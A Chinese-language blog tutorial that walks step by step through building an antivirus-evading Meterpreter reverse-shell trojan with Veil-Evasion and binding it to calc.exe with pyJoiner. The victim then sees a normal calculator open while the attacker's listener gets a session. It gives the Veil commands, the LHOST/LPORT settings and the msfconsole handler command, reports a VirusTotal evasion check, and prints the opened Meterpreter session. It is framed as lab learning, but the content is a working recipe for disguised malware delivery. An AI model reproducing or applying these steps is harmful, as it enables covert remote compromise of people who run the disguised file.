Veil-Evasion + pyJoiner 捆绑两个 EXE 的免杀木马


0x00 前言

最近在学习 veil 的 Veil-Evasion 模块,发现一款能捆绑两个 exe 文件的 pyJoiner 工具,便拿来学习学习。

0x01 在kali linux 2018.1 安装使用 veil 3.1.1 制作回连木马

  • Veil-Evasion 制作回连木马

    root@kali:~# veil
    use 1                        #选择使用 Veil-Evasion 模块
    Veil-Evasion Menu
        41 payloads loaded
    Available Commands:
        back            Go to main Veil menu
        checkvt            Check virustotal against generated hashes
        clean            Remove generated artifacts
        exit            Exit Veil
        info            Information on a specific payload
        list            List available payloads
        use            Use a specific payload
    Veil-Evasion command: use 11        #选择payload
    [cs/meterpreter/rev_tcp>>] set LHOST 192.168.3.149
    [cs/meterpreter/rev_tcp>>] set LPORT 4444
    [cs/meterpreter/rev_tcp>>] generate
    

    veil

    使用以下命令开启监听:

    root@kali:~# msfconsole -r /var/lib/veil/output/handlers/test.rc

0x02 配置 pyJoiner—GUI-Version 运行环境

GitHub 上有两个版本 项目地址 ,其中 kali 版必须使用 Kali Linux i386 ,我的是 x64 kali ,所以选择了 Windows版本的 pyJoiner—GUI-Version。

本次实验 pyJoiner 运行环境如下:

  • Windows 10
  • Python 3.6.3
  • pyinstaller 3.3.1

0x03 将两个exe文件进行捆绑

这里捆绑的是 calc.exe 这个程序,将回连木马 test.exe 与其进行捆绑,过程如下:

py -3 pyJoiner.py #在 pyJoiner 目录下运行 CMD 执行命令,切记不要关闭CMD

打开 GUI 如下图:

GUI

实验中 file1 选择的 calc.exe ,file2 选择的回连木马test.exe, 选择好之后点击 Join 。

捆绑后生成的 exe 路径如下:

路径

0x04 免杀回连测试

使用在线查杀引擎 virustotal 的结果如下:

virustotal

回连测试:

  • 目标机 Windows 10
  • 在目标机双击捆绑后的文件,打开了捆绑的 file1 应用程序计算器
  • calc
  • kali 回连 Meteoreter session
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.3.138
[*] Meterpreter session 1 opened (192.168.3.149:4444 -> 192.168.3.138:38099) at 2018-03-06 07:22:08 -0500

参考资料

https://www.youtube.com/watch?v=vHz8QU2Dj9M

https://github.com/danielhnmoreno/pyJoiner---GUI-Version


文章作者: yaron
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yaron !
 上一篇
windows linux 应急响应流程及实战演练 windows linux 应急响应流程及实战演练
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。
2021-06-08
下一篇 
通过降级连接劫持RDP明文凭据 通过降级连接劫持RDP明文凭据
Seth是一种用Python和Bash编写的工具,用于通过尝试降级连接以提取明文凭据来进行MitM RDP连接。它的开发目的是为了提高认识,并在笔试,讲习班或会谈的背景下教育正确配置的RDP连接的重要性。作者是Adrian Vollmer
  目录